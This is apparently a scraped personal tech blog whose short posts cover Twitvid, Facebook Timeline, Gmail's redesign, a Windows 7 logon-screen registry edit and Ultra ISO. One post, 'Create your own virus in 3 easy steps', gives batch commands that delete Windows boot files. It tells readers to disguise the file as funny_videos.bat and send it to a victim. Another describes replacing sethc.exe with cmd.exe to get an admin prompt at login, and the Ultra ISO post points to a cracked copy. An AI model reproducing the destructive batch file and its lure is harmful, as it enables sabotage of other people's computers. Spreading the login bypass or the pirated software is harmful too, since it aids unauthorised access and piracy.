Twitter updates twitvid - an effort to change the videos on social sites

Twitter has decided to take their video sharing service, known as Twitvid, and take it in a completely new direction. Now, instead of just being a repository for users to upload videos, like Twitpic, it is a complete video sharing platform. Instead of just posting videos you have created, you can share videos from anywhere on the web, such as YouTube, Vimeo and Twitvid, but they hope to expand the service soon.


As you would expect with a service by Twitter, the main idea is to follow users and keep track of their videos. However, where Twitvid differs is in the “subchannels.” These are channels that users can create that can be followed independently of the user’s overall account. If you have a group of friends who are only interested in a certain type of video, you can create a channel, and direct them to follow that channel only.

Twitter is hoping for Twitvid to become a place for users to watch and discuss videos at the same time. They have implemented a system for users comments to appear along with the video, to facilitate discussion.

The end game here is not for Twitter to beat YouTube, because there is no one that can contest them now. Rather, they are hoping for Twitvid to be a place where videos from other services can live in a social setting.

Facebook Timeline now available for everyone

Facebook's timeline a new way to present your profile has gone live today and is available to all the regular users around the world. But you need to opt in to apply for the new features.

You can get the Facebook timeline from the official page. Click the 'get it now' button and you will be redirected to a page that will view your timeline profile. Once enabled you need to setup everything. The profile is available for 7 days after which it will go live to all the audience around the world. In these 7 days you can tinker with the design and choose which posts to display and which ones to hide.
If you are satisfied by the changes you can PUBLISH the profile right now and it will be public.

There are several new features with the Facebook timeline.

• Earlier you could hide or delete your status updates. Now you can even highlight the updates you would like other people to notice.
• You profile now contains a profile cover apart from the profile picture. This can be used to express your style/mood/professional front.
• You will find a feature 'Activity Log' on your timeline profile. This log shows all your activities done by you ever since you were born on Facebook. So you might want to hide some of them.
• There are several new rules like who can post to your timeline and who cant and so its worth reviewing your profile before hitting the publish button.

At last I would like to conclude that Facebook has kept your privacy settings intact but its never a bad option to go through the options once again.

A post for NFS enthusiasts. Have you played NFS -The Run yet..? If not..well you must try it..(though its a whooping 17GB game)..

For all those who have played it must be frustrated by all the locked cars in the game.

Return visit aware: the future of networking knows what you have consumed.
Personally I don't know how many people have noticed this return visit functionality of Facebook.

We all remember Facebook had two tab earlier. 'Most Recent' & 'Top News' stream.
Users who used to login once in a day preferred the top news stream whereas returning users viewed the most recent stream to get the latest updates from their friends and colleagues.

The new layout of Facebook has come out with a great solution regarding this problem.
If you haven't noticed it yet, try it now..

Importance: Facebook had been struggling earlier since most of the users didn't see the two tabs at top and found Facebook to be stale, causing them to leave the site or simply navigated away.
So returning users find new content on the site, which undoubtedly increases traffic on Facebook.
This is what I get on returning to Facebook..

Smart move Facebook as it solved all these problems by aligning its interface with natural human habits.  (deserved the blue Facebook color)

Change the logon screen on Windows 7

Be it screensavers, desktop wallpapers or font type and sizes, visual customization at the OS level is usually important to all kinds of users.
Finally Microsoft has incorporated a new feature in the latest build (7057) of Windows 7 which supports the end user to change the logon screen background without using any hacks or third-party tools.

In previous versions including Windows Vista as well users had to install a third party software like tune-up utilities to change the logon screen. This even slowed the booting time. But in Windows 7 changing the boot screen is as simple as changing the wallpaper..(ok..not that easy)..

Hands On approach:-

This method will require you to modify the registry, no need to freak out..this might be your first registry edit..viola!!


Step 1: Press (Windows Key) + R , to open the RUN dialog box.

Step 2: Type 'regedit' without the inverted commas and press Enter.

Step 3: See the left pane and navigate to:-
HKEY_LOCAL_MACHINE->SOFTWARE->Microsoft->Windows->CurrentVersion->Authentication->LogonUI->Background

Step 4:If the key does not exist, add a new DWORD value with the name OEMBackground. (Right click->New->DWORD)

Step 5: Double click on the entry OEMBackground, and change the value from 0 to 1.

Your registry editor window should look like this.

Step 6: Open Windows Explorer and go to the following path: %windir%\system32\oobe.

Step 7: Create a new folder named info, and open it.

Step 8: Create a new folder within info named backgrounds.

Step 9: In this folder save any image(not larger than 256KB) you would like to appear at your logon screen. Once you save the image in this folder rename it to backgroundDefault.jpg .
I chose this image.

Step 10: Reboot your computer and this should do the trick.. Have fun..!!

Create your own virus in 3 easy steps

Creating an elementary virus is very easy if you have the talent to fool your victim. I describe you today an ethical way to create a virus that runs only when deliberately clicked ("ethical").

Step 1.>
Open notepad and type the following lines exactly without any alteration:-

del "C:\WINDOWS\SYSTEM32\bootok" /Q /S >nul
del "C:\WINDOWS\SYSTEM32\bootvid.dll" /Q /S >nul
del "C:\WINDOWS\SYSTEM32\bootvrfy" /Q/S >nul

Your notepad window should look like this:-

These commands delete the bootvid.dll file from your windows directory and therefore will completely disable the booting up of PC next time your victim would start the PC.
This problem can only be solved by re-formatting the entire C drive and re-installing windows.

Step 2.>
File->SaveAs
Save the above notepad file with any filename.bat you think that your victim would open most likely.

I used the name funny_videos.bat and saved the file on my desktop.
It appears as:-

It is no longer a step. Just e-mail this file or run this file on your victim's computer and it will refuse to start.

CONGRATULATIONS!!! You just created your first virus..

WARNING: NEVER run the file you created on your own system.

Reset Your Forgotten Windows Password the Easy Way

Forgetting your password is never any fun, but luckily there’s a really easy way to reset the password. All you need is a copy of the Windows installation disk and one simple command line trick.

Resetting Your Forgotten Windows Password

Boot off the Windows disk and select the “Repair your computer” option from the lower left-hand corner.

Follow through until you get to the option to open the Command Prompt, which you’ll want to select.

First you’ll want to type in the following command to backup the original sticky keys file:

copy c:\windows\system32\sethc.exe c:\

Then you’ll copy the command prompt executable (cmd.exe) over top of the sticky keys executable:

copy c:\windows\system32\cmd.exe c:\windows\system32\sethc.exe

Now you can reboot the PC.

Resetting the Password

Once you get to the login screen, hit the Shift key 5 times, and you’ll see an administrator mode command prompt.

Now to reset the password—just type the following command, replacing the username and password with the combination you want:

net user  "username" "new password" (without the " " )

That’s all there is to it. Now you can login.

Although this isn’t directly Android related, I think it would be safe to assume we’re all Gmail users. Well, a video introducing the all new Gmail “user experience” appeared on Google’s YouTube channel yesterday. Apparently, Google wasn’t quite ready to unveil the all new Gmail to the world and promptly pulled the video. Thankfully, it wasn’t before a quick ‘Tuber could mirror the video onto their own channel for the world to gawk over.



The new Gmail UI was introduced a few weeks back in the Preview theme and follows the design we’ve seen from Google services like Google+ and Google Calendar. As far as features go, Gmail will have an all new action bar (similar to what we’ve seen in Ice Cream Sandwich) featuring icons instead of text for options like reply, delete and tags. The conversation interface has seen a revamp as well, displaying profile pictures beside contacts, making it easier to read and identify who is saying what in your conversation.



Google also showed off an all new search box with advanced options as well as a layout that readjusts when resizing the window. Like the Preview theme, the new Gmail will feature various display densities and an option for resizing the chat and labels in the sidebar. Lastly, cane all new "high-definition" themes for Gmail.

All in all, I’d say Google did a bang up job on the new Gmail. Who knew Gmail could be so vastly improved, oh that’s right -- Google did. The new Gmail is expected to rollout in the coming weeks but in the meantime, you can check out the pulled YouTube video below.

Make virtual dvd drive and virtual discs using Ultra ISO

Ever wanted to make a backup of entire DISC/CD/DVD and maybe you don't want to copy the entire contents of the disc to your hard drive to store it. Doing so with Windows installation discs will lose its booting property.

You can download the cracked version of the software here.

Once installed. It will automatically setup a virtual drive on your computer. Open My Computer and see yourself. No need to panic if you see an extra DVD drive being displayed. You have just successfully setup a virtual drive.

To make a copy of any disc.

1. Load the desired disc in your physical drive.
2. Run Ultra ISO.
3. Tools-> Make CD/DVD image or simply press F8.

--> Select the desired location for output file and click on 'Make'.
--> After the process is complete that a file with .iso extension appears in the location you selected.
--> Again open Ultra ISO.
--> Tools-> Mount to virtual drive or simple press F6.

 

Click on mount and you are done.

Open My Computer and see the extra DVD icon that had just been created. It is labelled with the disc name you inserted in your physical drive. You no longer need the actual disc again in the future.

Most of these features are UN-necessary but still can  keep you glued on for a while...
